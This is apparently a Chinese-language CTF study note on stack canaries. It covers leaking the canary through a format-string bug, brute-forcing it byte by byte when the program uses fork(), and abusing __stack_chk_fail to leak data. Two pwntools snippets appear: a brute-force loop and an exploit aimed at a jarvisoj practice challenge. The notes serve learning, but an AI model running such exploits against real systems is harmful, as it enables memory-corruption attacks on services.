canary
在函数执行语句之前,在栈上插入一个值,这个值不能得到或预测,在函数语句执行完之后,会查看栈中的值是否被修改/覆盖来判断是否被溢出,若值被修改则调用___stack_chk_fail()来结束程序。
利用方法:
1. 泄露canary
使用条件:格式化字符串漏洞+找到canary在栈中的偏移
利用格式化字符串漏洞等泄露出canary
2. 爆破canary
使用条件:有fork()机制
在有fork()机制的文件上,fork()的作用相当于自我复制,每一次复制出来的程序,内存布局都是一样的,当然canary值也一样。那我们就可以逐位爆破,如果程序GG了就说明这一位不对,如果程序正常就可以接着跑下一位,直到跑出正确的canary。
注意:canary的最低位是\x00,32位canary的值是4字节,64位为8字节。
爆破:以32为例
canary = '\x00'
for j in range(3):
for i in range(0x100):
cn.send('a'*100 + canary + chr(i))
a = cn.recvuntil('welcome\n')
if 'recv' in a:
canary += chr(i)
break
3. 故意触发canary (Stack Smashing Protector)
当canary的值与原来不一致时,会调用___stack_chk_fail()函数,这个函数会将栈上的arg[0]参数打印出来,我们可以通过覆盖该参数来使程序打印出想要的内容
from pwn import *
context.log_level = 'debug'
cn = remote('pwn.jarvisoj.com', 9877)
#cn = process('pwn_smashes')
cn.recv()
cn.sendline(p64(0x0400d20)*200)
cn.recv()
cn.sendline()
cn.recv()